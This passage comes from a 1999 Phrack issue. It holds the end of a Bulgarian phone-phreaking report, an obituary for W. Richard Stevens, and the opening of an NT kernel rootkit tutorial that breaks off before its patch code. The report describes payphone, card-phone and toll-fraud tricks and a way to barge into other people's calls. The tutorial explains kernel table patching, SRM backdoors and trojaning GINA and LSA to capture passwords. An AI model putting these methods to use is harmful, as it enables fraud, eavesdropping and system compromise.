~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Hmmm... how to begin... err... So, 98% from our local tandem exchanges are
SxS A-29 type (made by Siemens). A typical SxS exchange - no computerization,
strowger switches, sleeve. The impedans is 600ohms, the battery by off-hook
is 60V, by on-hook - 10V. The resistance range is within 0-1600Ohms, the
current - within 15-100mA, but usually is 40-60mA.
A mini Bulgarian crossbar system (KRS-200) is used in some small villages
(up to 200 subscribers). As transit national exchange is used "Crosspoint"
(made by Siemens too) aka ESK-1000. The Crosspoint's switch is a ESK-relay.
ESK stands for Edelmetal-Schnell-Kontakt auf Deutsch. Also "Crosspoint" is
used as local tandem in some of the big cities.
In Sofia (our capital) is located a transit international exchange MT-20
(by THOMSON - France). Also year ago our Telco began to install real digital
switching systems there. But the tax for these is terrible and their subscribers are companies, offices and some bastards with a lot of money... and the
most of capital ISPs ;)
The cables are quite old, there is much of background noise in the handset,
the modem connections are terrible - with a 14.4K modem the average speed is
1000bps, it drops you on every 3 minutes. After rain there is no subscriber
with normal connection.
So the number detection here is too hard. By us ONLY the calling party can
drop the connection. So if you want to catch someone, you make a complaint to
the telco. She put on your Linefinder a device, named 'dog'. That 'dog'
effects on the switch contacts, so you can hold the connection. After that,
you call the Telco from the neighbors and they catch the called party number
by the wires. But 'the dog' don't work by long distance conversations. Also
we have an ANI equipment, named 'AMUR' or 'SKAT', specially designed for SxS
switches, but in the villages and very small towns, there isn't any ANI. So
with ANI the Telco can catch you, but they don't use it for normal cases, I
think, you know 'why' ;))) But if you make a call from a different area the
Telco can't catch you even with the help of ANI :) But nobody knows that :(
All the people think: "The Telco ALWAYS CAN DETECT your number! There is no
chance to mislead them". Blah, what for idiots. Btw I try to test here the
forced ANIF, so I hope to get it in work. In my town (47 000 citizens) we ha-
ve ANI equipment, but all the Telco employers says - it's used only for sub-
scribers info. The billing information here is still collecting with the help
of photographs. No operator comes on my line when I flash the switchhook.
Signaling
~~~~~~~~~~
I devoted a 2 years on learning the signaling methods in Bulgaria, but:
1. There aren't good tech books about signaling. In some books it is menti-
oned quite cursory. 70% and higher about signaling I have learned from
several Phrack articles.
2. Nobody from the local Telco in my town knows anything about this. I talked
with a few high educated employers, but they knew less than me :(
Well, I have learned the following from the books (and from other places):
N4 and N5 is used on international circuits, otherwise R2 is used. Well, I
know that "Crosspoint" uses R2, but I'm not sure that the stupid A-29 (SxS
type) uses the R2 signaling system. Also, I have read in a tech book, that
(!) R2 is in-band signaling system. But we all know, that this is not true,
because the blow-off frequency for R2 is 3825Hz.
The major multiplexing is FDM with 4KHz channels. So if you whistle 3825Hz
tone in the microphone, when speaking on LD, the other end will hear that.
So we try to blue box with programs. If that success, we will announce that :)
But I think - there are line and rejector filters at the end of our trunks
and the signal must be clear (a straight sinusoide). An telco employer said
to me, he heard about 2100Hz signal, but he wasn't sure :( Can anyone help?
Our beloved Telco
~~~~~~~~~~~~~~~~~
So by us, the BTC (Bulgarian Telecomunication Company) was always monopo-
listic. Also they try now to occupy and take under full control all ISP in
Bulgaria. The local calls are not free and our taxes are the highest in Euro-
pe. Our average salary is 100$ and we pay 0.04$ for each tax unit. There are
also permanent taxes and other thing and for comparison if you have 200 units
you'll pay 10$. That's 12% from the average salary in country!!! Also if you
dial from Canada to Bulgaria that'll cost you 0.8$ per minute, BUT IF YOU
CALL Canada from Bulgaria (btw we can't dial direct North America without ope-
rator assistance) that'll cost you 2.3$ per minute he-he-he :)
So this year our Telco is going to go private. There was 3 candidates to
buy 51% from Telco's shares - Deutsche Telecom/Turkey firm, Telefonica and
the Holland/Greece telcos. The price was 500 000 000$. But Telefonica and DT
gave up in the last moment. Maybe you guess why? Nobody want to throw his mo-
ney for Telco, that uses 98% SxS switches, where a big part from peoples
(70%) are poor and don't make many calls (under 100 units), in which country
you don't know what will happen tomorrow and etc...
So, as I've read about Argentina's telco, I can say: the situation is al-
most the same. But by us there is ONLY ONE company which control anything -
all the phones, pagers, a big part of GSM network, all public phones, runs
the only X.25 datapac network - BULPAC, they are also ISP... Total monopoly!
The Laws
~~~~~~~~
Ha-ha-ha? What for laws? Against phreaking? There is no way :) Also nobody
in Bulgaria don't understand what {the fuck} term 'phreaking' means. And not
just the ordinary people. If you are in the IRC channel #bulgaria and ask:
"Hey, what does the phreaking mean?", I'm sure that nobody shall know.
Up to now, I didn't hear about someone to get busted for phreaking. Our telco
(and all of their employers) think - the system is unbreakable! But they also
have an law about devices, that are illegally hooked to the phone line. At the
first time you'll be warned 'bout that, and at the second time you'll be dis-
connected. But you pay the tax for new phone (100$) and congratulations - you
already have a phone :)
So, our legislation don't contain anything about hacking, cracking, phreaking
and all kinds of electronic frauds. In Bulgaria there is no term such as
'illegal software' or 'illegal access to someone's computer'.
The PayphoneZ
~~~~~~~~~~~~~
There is no good word to say about our shitty motherfucking Telco, even for
payphones. You think - you can do red boxing in Bulgaria. Forget it! Our
Payphones a COCOT and are used only for local calls! There are huge, metal
boxes :) full mechanical, no fine electronics! You can see inside a capacitor
like a hand bomb! The Payphones worked with coins, but there was so many idi-
ots, who took out there coins from the payphones with a thread (string). So
our beloved Telco become a mad about this and they replace the coins with a
special made by them phone-coins with borders, which made them impossible to
take out ;). As I have said, the payphones are COCOT - you take the handset,
hear a dialtone, dial a number (pulse, with a dialing disk!!!), the called
person answers... and then the polarity is reversed. A relay inside the phone
notice that and after 3 seconds cuts off the mouthpiece... and the earpiece.
Then the hole for the money gets opened and the coin falls inside. There are
no such terms such a coin return.
There is a trick to make free calls (local) on these phones. If you press
the hook, when the polarity is reversed, there is no current on the line in
that moment, and because there is no current in that moment, the relay
wouldn't
be noticed for the answer, and it wouldn't cut the mouth- earpiece.
Another trick is to unlock the phone and fill your pockets with coins :)
The lock picking on these is quite easy...
There was also payphones for international and LD calls operating with
money, but 10 years before began an big inflation and these phones died.
Now you should to put a lot of coins (2-5kg) to make a 3 min international
call.
So 5-6 years before our telco installed two types of card-phones: BetCom and
Bulfon. BetCom is British-Bulgarian Company (GPT&BTC) and their card phones
are magnetic strip style. The security of these card was too weak so a few
people began to make free phone calls. After 3 years loosing a lot of money
from these frauds, BetCom install new phones and change the cards with elec-
tronic ones, but there are still many old phones :) You just copy the
magnetic strip of the card and here it is...
The Bulfon phones are much intelligent. They are the same such as these in
Argentina and Germany. The test signal is 16KHz, with nice LCD display, have
button for several languages, for replacing exhausted cards, for signal am-
plification and other options. I forgot to say, that both the cardphones use
pulse dialing. They usual don't have a number to dial the cardphone, but for
a short time the phones in the capital have already a number... and MF
dialing.
There was a very popular trick on Bulfon cardphones with 2 cards - full one
and empty one (bat at least with 1 unit). You quickly push and pull the full
card into the slot and the display begin to flash. After that you do this
again and put the empty card. The phone remember the units from the first
card and you talk for free. A big amount of people became familiar with this
and they began to use it for and without need. And since our telco is mad
for every loosed penny, this feature bombed out. Also I have heard, that a
few people recharge cards and make unlimited ones (a PIC emulator), but since
I'm not a cardphreaker, I don't know much about it. But I know that the
bulfon exchange is very sophisticated and it's very hard to fool those. For
example, you can't dial more than 400 units with the same card from one
cardphone. And yet one funny feature - every night, a built-in modem in the
cardphone establish a connection with the Bulfon exchange and transfer info.
Info such as - how many units are used, the cards serial number and much more
(such as frauds).
If you, for example, steal a few cards from the post office, the exchange
send to all the phones, that cards with a number 444 xxx xxx ... are invalid.
Ahh... I forgot, the public phone cables don't go through PVC or metal pi-
pes. But... on Bulfon (and I think - and on BetCom) phones you can't just cut
the wire and hook with a handset, because as you know the line device can't
find the phone - when you pick up the handset on Bulfon, the exchange send
16KHz test signal and the phone must answer with the same signal. The CPU of
these is 68HC11 (Motorola).
btw we have a GSM network since 1995. Also we have a pager network.
Phreaking methods
~~~~~~~~~~~~~~~~~
As I have said, there aren't phreak wise people in Bulgaria (but almost every
is interested in hacking). A lot of falsely accused 'phreaks' do pitting -
hooking with a handset to a pair of wires or the outside connection box.
Phreak methods used by me are:
- forced 3way calling = some type of abuse the structure of the connector.
So, in my town the NPA is X-YY-ZZ. So lets imagine, that someone called
4-33-28. I begin to dial 4-33 and when I hit the right pause after the 3rd
it's puts me into their conversation.
- free calling from local payphones = already talked bout that.
- free calling on local and short haul calls - by dialing a chain of prefi-
xes (such as in UK). I dial the prefix (NPA) of the town X, and after that
dial the prefix for another place and then the number. But not every exchan
ge allows you to make that. Your exchange waits a signal from exchange X,
that a called party is answered, but the X waits too for that... But the
connection is terrible... and after 3 minutes without taxing on the trunk
your Telco cuts the connection ;(
Also I think that black and blue boxing is still possible, but didn't test
it entirely.
There also "hidden" long distance numbers and prefixes, which are very use-
ful in some cases (I also found 3-4 of them), but nobody try to find it :(
There aren't free numbers in Bulgaria, except these for police, fire alarm,
hospital and the telco number for failure complaints, but they are ONLY FOR
LOCAL DIALING! I also discover a method to call these as trunk-calls, BUT...
but our phone system is made so, that if on a trunk-call there isn't a tax
signal coming after 3 minutes, the call is terminated.
Some people with knowledge of electronic also make "free calls" through
their neighbor's lines, but BTC is familiar with those methods and it always
check the line (plus these of the neighbors) when a subscriber made a com-
plaint for big bill.
In Bulgaria there are NO PBX-es, Voice Mail Systems, WATS numbers, Call for-
warding, Call waiting, DTMF requesting, Speed dialing and other.
About PBX - some of our factories have PBX-es, but I still learn how to use/
abuse them.
In almost every town with more than 10 000 subscribers we have a conference
phone, which can be dialed only local (errrr... quite not true ;)) for 1
tax unit per 3/5/10/30 minutes. But the stupid people don't know that and
in many towns (such as mine) this phone is *forever* free.
I also have heard about peoples, which emulate the GSM SIM card to make free
calls.
PHREAK'EM ALL!!!
�
0x05>------------------------------------------------------------------------
----[ PDM
Phrack Doughnut Movie (PDM) last issue was `Dark City`.
PDM54 recipients:
I forget. I think Adam Shostack was definitely one. It's been a while
though.
PDM55 Challenge:
"Beware my wrath."
0x06>------------------------------------------------------------------------
----[ Super Elite People That REad Phrack (SEPTREP)
New additions:
Why they are SEP:
----[ Current List
W. Richard Stevens
Ron Rivest
-----------------------------------------------------------------------------
----[ EOF
-------[ Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 04 of 19 ]
-------------------------[ P H R A C K 5 5 P R O P H I L E ]
This issue we're doing something a bit differently. Normally, this file is
reserved for the Phrack Prophile. However, this issue, we are instead paying
homage to a recently deceased esteemed member of the upper echelon of the
computer elite. This is our little way of providing a tribute to the most
widely read TCP/IP author in history.
I first read Stevens in 1992. I still have that first edition UNIX Network
Programming book sitting on my shelf. I learned a great deal from that book,
but that was nothing compared to how much the TCP/IP Illustrated series taught
me... I remember getting vol. I in 1994.. I still have that one too, all
marked up with highlighters and whatnot... Before I knew it, I found myself
firmly immersed in IP networks (I even read vol. II from cover to cover).
I know I have Stevens to thank for sparking that interest in me. His death
is a great loss.
There is also another reason why W. Richard Stevens is featured here -- he was
to be the prophile for Phrack 55.
I sent Richard email initially on August 31st asking him if he would have
time to be profiled for Phrack 55. To my great delight (and somewhat suprise)
he agreed! I emailed him the template, and sent him a follow-up email...
The last I heard from him was on September 1st, telling me that he was
pretty busy and needed some time to look it over. Sadly this is also the
day he died. These emails will not appear here out of respect for Stevens
and his family. Instead, republished here is a copy of his obiturary from
www.bigdealclassifieds.com.
STEVENS, W. Richard, noted author of computer books died on September 1.
He is best known for his ``UNIX Network Programming'' series (1990, 1998,
1999), ``Advanced Programming in the UNIX Environment'' (1992), and ``TCP/IP
Illustrated'' series (1994, 1995, 1996). Richard was born in 1951 in Luanshya,
Northern Rhodesia (now Zambia), where his father worked for the copper
industry. The family moved to Salt Lake City, Hurley, New Mexico, Washington,
DC and Phalaborwa, South Africa. Richard attended Fishburne Military School in
Waynesboro, Virginia. He received a B.SC. in Aerospace Engineering from the
University of Michigan in 1973, and an M.S. (1978) and Ph.D. (1982) in Systems
Engineering from the University of Arizona. He moved to Tucson in 1975 and
from then until 1982 he was employed at Kitt Peak National Observatory as a
computer programmer. From 1982 until 1990 he was Vice President of Computing
Services at Health Systems International in New Haven, CT, moving back to
Tucson in 1990. Here he pursued his career as an author and consultant. He
was also an avid pilot and a part-time flight instructor during the 1970's.
He is survived by his loving wife of 20 years, Sally Hodges Stevens; three
wonderful children, Bill, Ellen and David; sister, Claire Stevens of Las Vegas,
NV; brother, Bob and wife Linda Stevens of Dallas, TX; nieces, Laura, Sarah,
Collette, Christy; and nephew, Brad. He is predeceased by his parents, Royale
J. Stevens (1915-1984); and Helen Patterson Stevens (1916-1997). Helen lived
in Tucson from 1991-1997, and Royale lived here in the early 1930's attending
Tucson High School while his father was treated for TB at the Desert
Sanitorium (now TMC). The family asks that in lieu of flowers, donations
be made in Richard's name to Habitat for Humanity, 2950 E. 22nd Street,
Tucson, AZ 85713.
-- route
----[ EOF
-------[ Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 05 of 19 ]
-------------------------[ A *REAL* NT Rootkit, patching the NT Kernel ]
--------[ Greg Hoglund <hoglund@ieway.com> ]
Introduction
------------
First of all, programs such as Back Orifice and Netbus are NOT rootkits. They
are amateur versions of PC-Anywhere, SMS, or a slew of other commercial
applications that do the same thing. If you want to remote control a
workstation, you could just as easily purchase the incredibly powerful SMS
system from Microsoft. A remote-desktop/administration application is NOT a
rootkit.
What is a rootkit? A rootkit is a set of programs which *PATCH* and *TROJAN*
existing execution paths within the system. This process violates the
- INTEGRITY* of the TRUSTED COMPUTING BASE (TCB). In other words, a rootkit is
something which inserts backdoors into existing programs, and patches or breaks
the existing security system.
- A rootkit may disable auditing when a certain user is logged on.
- A rootkit could allow anyone to log in if a certain "backdoor" password is
used.
- A rootkit could patch the kernel itself, allowing anyone to run privileged
code if they use a special filename.
The possibilities are endless, but the point is that the "rootkit" involves
itself in pre-existing architecture, so that it goes un-noticed. A remote
administration application such as PC Anywhere is exactly that, an application.
A rootkit, on the other hand, patches the already existing paths within the
target operating system.
To illustrate this, I have included in this document a 4-byte patch to the NT
kernel that removes ALL security restrictions from objects within the NT
domain. If this patch were applied to a running PDC, the entire domain's
integrity would be violated. If this patch goes unnoticed for weeks or even
months, it would be next to impossible to determine the damage.
Network based security & the Windows NT Trust Domain
----------------------------------------------------
If you know much about the NT Kernel, you know that one of the executive
components is called the Security Reference Monitor (SRM). The DoD Red Book
also defines a "Security Reference Monitor". We are talking the same language.
In the Red Book, a security domain is managed by a single entity.
To Quote:
"A single trusted system is accredited as a single entity by a single
accrediting authority. A ``single trusted system'' network implements a
reference monitor to enforce the access of subjects to objects in accordance
with an explicit and well defined network security policy [DoD Red Book]."
In NT parlance, that is called the Primary Domain Controller (PDC). Remember
that every system has local security and domain security. In this case, we are
talking about the domain security. The PDC's "Security Reference Monitor" is
responsible for managing all of the objects within the domain. In doing this,
it creates a single point of control, and therefore a "single trusted system"
network.
How to violate system integrity
-------------------------------
I know this is alot of book theory, but bear with me just a bit longer. The
DoD Orange Book also defines a "Trusted Computing Base" (TCB). If you are an
NT programmer, then you have likely worked with the security privilege
SE_TCB_PRIVILEGE. That privilege maps to the more familiar "act as part of the
Operating System" User-Right. Using the User Administrator for NT you can
actually add this privilege to a user.
If you have the ability to act as part of the TCB, you can basically do
anything. There is very little security implemented between your process and
the rest of the machine. If the TCB can no longer be trusted, then the
integrity of the entire network system is shot. The patch I am about to show
you is an example of this. The patch, if installed on a Workstation, violates
a network "partition". The patch, if installed on a PDC, violates the entire
network's integrity.
What is a partition?
The Red Book breaks the network into NTCB (Network Trusted Computing Base)
"Partitions". Any single component or machine on the network may be considered
a "partition". This makes it convenient for analysis.
To Quote:
"An NTCB that is distributed over a number of network components is referred
to as partitioned, and that part of the NTCB residing in a given component is
referred to as an NTCB partition. A network host may possess a TCB that has
previously been evaluated as a stand-alone system. Such a TCB does not
necessarily coincide with the NTCB partition in the host, in the sense of
having the same security perimeter [DoD Red Book]."
On the same host you may have two unique regions, the TCB, which is the
traditional Orange Book evaluation for Trusted Computing Base, and the NTCB.
These partitions do not have to overlap, but they can. If any component of one
is violated, it is likely that the other is as well. In other words, if a host
is compromised, the NTCB may also be compromised.
Obviously to install a patch over the TCB, you must already be Administrator,
or have the ability to install a device driver. Given that Trojans and Virii
work so well, it would be very easy to cause this patch to be installed w/o
someone's knowledge.
Imagine an exploit
------------------
Before I digress into serious techno-garble, consider some of the attacks that
are possible by patching the NT kernel. All of these are possible because we
have violated the TCB itself:
1. Insert invalid data. Invalid data can be inserted into any network stream.
It can also introduce errors into the fixed storage system, perhaps subtly
over time, such that even the backups get corrupted. This violates
reliability & integrity.
2. Patch incoming ICMP. Using ICMP as a covert channel, the patch can read
ICMP packets coming into the kernel for embedded commands.
3. Patch incoming ethernet. It can act as a sniffer, but without all of the
driver components. If it has patched the ethernet, then it can also stream
data in/out of the network. It can sniff crypto keys.
4. Patch existing DLL's, such as wininet.dll, capturing important data.
5. Patch the IDS system. It can patch a program such as Tripwire or
RealSecure to violate its integrity, rendering the program unable to detect
the nastiness...
6. Patch the auditing system, i.e., event log, to ignore certain event log
messages.
Now for the rare steak. Let's delve into an actual kernel patch. If you
already understand protected mode and the global descriptor table, then you can
skip this next section. Otherwise put on your hiking boots, there are a couple
of switchbacks ahead.
Rings of Power
--------------
Windows NT is unlike DOS or Windows 95 in that it has process-space security.
Every user-mode process has an area of memory that is protected by a Security
Descriptor. Usually this SD is determined from the Access Token of the user
that started the process. Access to all objects is handled through a "Access
Control List". For Windows NT, this is called "Discretionary Access Control".
Personally I find it really hard to grasp something if I don't understand it's
most basic details. So, this next section describes the very foundation that
makes security possible on the x86 architecture.
First, it is important to understand "protected mode". Protected mode can only
be understood by memory addressing. Almost all of the expanded capabilities of
the x86 processor are built upon memory addressing. Protected mode gives you
access to a 4 GB memory space. Multitasking and privilege levels are all
based upon tricks with memory addressing. This discussion only applies to 386
and beyond.
Memory is divided into code and data segments. In protected mode, all memory
is addressed as a segment + an offset. Conversely, in real mode, everything is
interpreted as an actual address. For our discussion, we only care about
protected mode. In protected mode things get a little more complicated. We
must address first the segment, followed by an offset into that segment. It
is sort of a two step process. Why is this interesting?? This is how most
modern operating systems work, and it is important for exploits and Virii. Any
modern mobile code must be able to work within this arena.
What is a selector?
A selector is just a fancy word for a memory segment. Memory segments are
organized by a table. These table entries are often called descriptors. So,
remember, a selector is-a segment is-a descriptor. It's all the same thing.
If you understand how the memory segments are kept track of, then you pretty
much understand the whole equation. Every memory segment is first a virtual
address (16-bits) plus an offset from that address (32-bits). A segment is not
an actual address, like in realmode, but the number of a selector it wants to
use. A selector is usually a small integer number. This small number is an
offset into a table of descriptors. In turn, the descriptor itself then has
the actual linear address of the beginning of the memory segment. In addition
to that, the descriptor has the access privilege of the memory segment.
Descriptors are stored in a table called the Global Descriptor Table (GDT).
Each descriptor has a Descriptor Privilege Level (DPL), indicating what ring
the memory segment runs in.
Suffice it to say, the selector is your vehicle. Under NT and 95, there
are selectors which cover the entire 4GB address range. If you were using
one of these selectors, you could walk all over the memory map from 0 to
whatever. These selectors do exist, and they are protected by a DPL of 0.
Under Windows 9x, selector 28 is a ring 0 that covers the entire 4gb region.
Under NT, selectors 8 and 10 achieve the same purpose.
Dumping the GDT from SoftIce produces a table similar to this:
GDTBase=80036000 Limit=0x03FF
0008 Code32 00000000 FFFFFFFF 0 P RE
0010 Data32 00000000 FFFFFFFF 0 P RW
001B Code32 00000000 FFFFFFFF 3 P RE
0023 Data32 00000000 FFFFFFFF 3 P RW
0028 TSS32 8001D000 000020AB 0 P B
0048 Reserved 00000000 00000000 0 NP
0060 Data16 00000400 0000FFFF 3 P RW
etc, etc ....
You can see what segment you are currently using by checking the CPU registers.
The registers SS, DS, and CS indicate which selectors are being used for Stack
Segment, Code Segment, and Data Segment. The stack and code segments must be
in the same ring.
1. Segments can overlap one another. In other words, more than one segment can
represent the same address-space. Segments can overlap one another wholly, or
only in part. The address range for a segment is important, of course, but
there is other delicious information we care about. For instance, a segment
also has a Privilege Level (DPL).
---- ----
| | | |
| | | |
| | ----
| | ----
| | | |
| | | |
---- | |
| |
----
What is a DPL?
Descriptor Privilege Level. This is important to understand. Every memory
segment is protected by a privilege level, often called a "ring". The Intel
processor has 4 rings, 0 through 3, usually only ring 0 and 3 are used. Lower
ring levels have more privilege. In order to access a memory segment, the
caller must have a current privilege level equal to or lower than the one being
accessed. Current privilege level is often called CPL, and descriptor
privilege level is often called DPL.
This type of protection is a requirement for almost any security architecture.
In the old days of DOS, mobile code such as virii were able to hook interrupts
and execute any code at whim. They were walking all over the memory map at
will. No such luck with the advent of Windows NT. There's a gaping need for
Windows NT exploits that can take advantage of the old tricks. The central
problem is that most code is executing within user mode, and has not access to
ring 0, and therefore no access to the Interrupt Descriptor Table or the
memory map as a whole.
Under NT, the access to ring 0 is controlled from the right to add your own
selector to the GDT. When you transition to ring 0, you are still in protected
mode and the Virtual Memory Manager is still operating.
Lets suppose you have written a virus that patches the Global Descriptor Table
(GDT) and adds a new descriptor. This new descriptor describes a memory
segment that covers the entire range of the map, from 0 to FFFFFFFF___. The
DPL of the descriptor is 0, so any code running from it can access other ring-0
segments. In fact, it can access the entire map. A DPL 0 memory segment
marked as "conforming" will violate integrity. The sensitivity label, in this
regard, would be the DPL. The fact it is conforming violates the DPL's of
other segments, if they overlap.
If your descriptor is marked conforming, it can be called freely from ring-3
(user mode). This new entry goes unnoticed, of course. Who monitors the GDT
on their system? Most people don't even know what that is. There are few IDS
systems that monitor this type of information. Now you have effectively placed
a backdoor into the memory map. You could be running under any process token,
and have full read/write access to the map. This means reading/writing other
important tables, such as the Interrupt Table. This means reading other
procii's protected memory. This means infecting other files and procii w/ your
virii at whim.
Patching the SRM
----------------
The Security Reference Monitor is responsible for enforcing access control.
Under NT, all of the SRM functions are handled by ntoskrnl.exe. If the
integrity of that code were violated, then the SRM could no longer be trusted.
The whole security system has failed.
The Security Reference Monitor is responsible for saying Yes/No to any object
access. It consults a process table to determine your current running process'
access token. It then compares the access token with the required access of
the object. Every object has a Security Descriptor (SD). Your running
process has an Access Token. Comparing these two structures, the SRM is able
to deny or allow you access to the object.
orange book:
"In October of 1972, the Computer Security Technology Planning Study, conducted
by James P. Anderson & Co., produced a report for the Electronic Systems
Division (ESD) of the United States Air Force.[1] In that report, the concept
of "a reference monitor which enforces the authorized access relationships
between subjects and objects of a system" was introduced. The reference
monitor concept was found to be an essential element of any system that would
provide multilevel secure computing facilities and controls."
It then listed the three design requirements that must be met by a reference
validation mechanism:
a. The reference validation mechanism must be tamper proof.
b. The reference validation mechanism must always be invoked.
c. The reference validation mechanism must be small enough to be
subject to analysis and tests, the completeness of which can
be assured."[1]
The SRM is *NOT* tamper proof. It may be protected by the TCB security
privilege, but I suggest that the only truly tamper-proof SRM is going to use
cryptographic mechanisms. Using an attack vector such as Virii or Trojan's, a
patch could easily be placed within the TCB.
You can patch the SRM itself if you have access to the map. In this, you can
insert a backdoor such that a certain user-id ALWYAS has access. However, this
does not require you to edit the user's security level in any way. You are
patching it at the access point, not the source. So, auditing programs will
not be able to notice the problem. This is a simple trick that could be
employed in any NT RootKit.
There are several key components to the NT Kernel. They are sometimes
referred to as the "NT Executive". The NT executive is really a group of
individual components with a well defined interface. Each component has such a
well defined interface, in fact, that you could actually take it out completely
and replace it with a new one. As long as the new component implemented all of
the same interfaces, then the system would continue to function. The following
are all components of the NT Executive:
HAL: Hardware Abstraction Layer, HAL.DLL
NTOSKERNL: Contains several components, NTOSKRNL.EXE
The Virtual Memory Manager (VMM)
The Security Reference Monitor (SRM)
The I/O Manager
The Object Manager
The Process and Thread Manager
The Kernel Services themselves
-(Exception handling and runtime library)
LPC Manager (Local Procedure Call)
Hey, these are some of the modules listed when a Blue Screen occurs! The
system is just a big memory map!
With all of this data we are bound to find structures of interest! Many key
data structures are crucial to security. Once we know what we are looking for,
we can get into SoftIce and start poking around. A list of the exported
functions for some of these components is in Appendix A.
Using a tool such as SoftIce, reverse engineering the SRM and other components
is easy ;) The methodology is simple. First, we must find the component we
are interested in. They all sit in system memory at some point...
Some key data structures are:
ACL (Access Control List), contains ACE's
ACE (Access Control Entry), has a 32-bit Access Mask and a SID
SID (Security Identifier), a big number
PTE (Page Table Entry)
SD (Security Descriptor), has an Owner SID, a Group SID, and an ACL
AT (Access Token)
Now for some tricks! The first thing we need to do is identify which of these
data structures we will be using. If we want to reverse engineer the Security
Reference Monitor, then we can be assured that our SID is going to be used in
some call somewhere.. This is where SoftIce comes in. SoftIce has an
incredible feature called expressions. SoftIce will let you define a regular
expression to be evaluated for a breakpoint. In other words, I can tell
SoftIce to break if only a special set of circumstances has occurred.
So, for example (working implementation):
1. I want softice to break if the ESI register references my SID. Since a SID
is many words long, I will have to define the expression in several portions:
bpx (ESI->0 == 0x12345678) && (ESI->4 == 0x90123456) && (ESI->8 == 0x78901234)
What I have done here is tell softice to break if the ESI register points to
the data: 0x123456789012345678901234. Notice how I use the -> operator to
offset ESI for each word.
Now, try to access an object. SoftIce will promptly break when your SID is
used in a call.
There are many system components that are worth reverse engineering. You may
also want to play with the following:
1. GINA, (GINA.DLL) The logon screen you see when you type your
password. Imagine if this component was trojaned.. A Virii could
capture passwords across the enterprise.
2. LSA (The Local System Authority) This is the module responsible for
querying the SAM database. This would be an ideal place to put a
rootkit-password that *ALWAYS* allows you access to the system.
3. SSDT, The System Service Descriptor Table
4. GDT, the Global Descriptor Table
5. IDT, the Interrupt Descriptor Table
Getting to ring zero in the first place
---------------------------------------
User mode is very limiting under NT. Your process is bound by the selector it
is currently using. The process cannot simply waltz over the entire memory
map. As we have discussed, the process must first load a selector. You cannot
simply read memory from 0 to FFF_, you can only access your own memory segment.
There are tricks however. If the process is running under a user token that
has "add service" privilege, then you can create your own call gate, install
it in realtime, and then use it to run your code ring 0. Once you are running
ring 0 you can patch the IDT or the Kernel. This is how User-Mode normally
accesses a Ring-0 Code Segment. If you don't want to go to this trouble,
you can upload a byte patcher that runs in ring zero on boot. This is as
simple as writing a driver and installing to run on the next reboot.
However, installing your own call-gate is by far the most sexy.
Lets talk sexy. The answer is a call gate. All of the functions provided by
NTDLL.DLL are implemented this way. This is why you must call Int 2Eh to make
a call. The entire set of Int 2Eh functions are known as the Native Call
Interface (NCI). What really happens is the Int 2Eh is handled by a function
in NTOSKRNL.EXE. This function is called KiSystemService().
KiSystemService() routes the call to the proper code location.
When you make a system call, you must first load the index of the function you
wish to call. This is loaded into register EAX. Next, if the call takes
parameters, a pointer to this block is loaded into EDX. Interrupt 2Eh is
called, and EAX holds the return value. This is old hat to most assembler
programmers.
What is not obvious is how this is implemented in the Kernel. The function
KiSystemService() is called, and left with the responsibility for dispatching
the call. KiSystemService() must first determine *WHAT* function to call next,
based on what we put in EAX. So, to this end, it maintains a table of
functions and their index numbers.. imagine that! SofIce will dump this table
if your interested. It looks something like:
:ntcall
Service table address: 80149398 Number of services:000000D4
0000 0008:8017451E params=06 ntoskrnl!NtConnectPort+0834
0001 0008:80199C16 params=08 ntoskrnl!SeQueryAuthenticationIdToken+04B8
0002 0008:8019B3A2 params=0B ntoskrnl!SePrivilegeObjectAuditAlarm+02B0
0003 0008:80158E50 params=02 ntoskrnl!NtAddAtom
0004 0008:80197624 params=06 ntoskrnl!NtAdjustPrivilegesToken+0422
0005 0008:80197202 params=06 ntoskrnl!NtAdjustPrivilegesToken
0006 0008:80196256 params=02 ntoskrnl!PsGetProcessExitTime+1848
0007 0008:8019620E params=01 ntoskrnl!PsGetProcessExitTime+1800
0008 0008:8015901E params=01 ntoskrnl!NtAllocateLocallyUniqueId
0009 0008:801592EC params=03 ntoskrnl!NtAllocateUuids
000A 0008:8017B0F6 params=06 ntoskrnl!NtAllocateVirtualMemory
000B 0008:8011B8E4 params=03 ntoskrnl!ZwYieldExecution+08AC
etc etc...
Well, this is all very interesting, but where is this table stored? How does
SoftIce manage to read it? Of course, it's all undocumented ;-) Here I have
no one to thank more than my friend from Sri Lanka, a fellow Rhino9 member, who
goes by the handle Joey__. His paper on extending the NCI is nothing less than
mind-blowing. I draw heavily upon his research for this section. I feel this
paper could not be complete without going over call-gates and the NCI, so I
paraphrase some of his work. For more detailed information on adding your own
system services, read his paper entitled "Adding New Services to the NT Kernel
Native API".
A very interesting thing happens when you boot NT. You start with about 200
functions in the NCI. These are all implemented in NTOSKRNL.EXE. But, soon
afterwards, another 500 or so functions are added to the NCI, these being
implemented in WIN32K.SYS. The fact that additional functions were added
proves that it is possible to register new functions into the NCI during
runtime.
The table that SoftIce dumps when you type NTCALL is called the System Service
Descriptor Table (SSDT). The SSDT is what the KiSystemService() function uses
to look up the proper function for a Int 2Eh call. Given that the NCI is
extensible, it must be possible to add new functions to this table.
As it turns out, there are actually multiple tables. WIN32K.SYS doesn't
actually add to the EXISTING system table, but creates a whole NEW one with 500
or so functions, and then ADDS it to the Kernel. To do this, it calls the
exported function KeAddSystemServiceTable(). So, in a nutshell, all we have to
do is create a new table with OUR functions and do the same thing.
Another angle on this involves adding our functions to the existing NCI table.
But, this involves patching memory. Again, that's what we do best. To pull
this trick off cleanly, we must allocate new memory large enough to hold the
old tables plus our additional entries. We then must copy the old tables
into our new memory, add our entries, and then patch memory so that
KiSystemService() looks at our new table.
The FOUR-Byte Patch
-------------------
Okay, lesson number one. Don't make yourself do extra work when you don't have
to. This is the story of my life. I started this project by reversing the
RtlXXX subroutines. For instance, there is a routine called
RtlGetOwnerSecurityDescriptor(). This is a simple utility function that
returns the Owner SID for a given security descriptor. I patched this routine
to check for the BUILTIN\Administrators group, and alter it to be the
BUILTIN\Users group. Although this patch works, it doesn't help me obtain
access to protected files and shares. The RTL routine is only called for
Process and Thread creation, it would seem. So, to make a long story short, I
have included the RTLXXX information and patch below. It will illustrate a
working kernel patch and should help you see my thought process as I 0wned a
key kernel function.
Okay, lesson number two. If at first you don't succeed, try another function.
This time I got very wise and decided to test a number of breakpoints in the
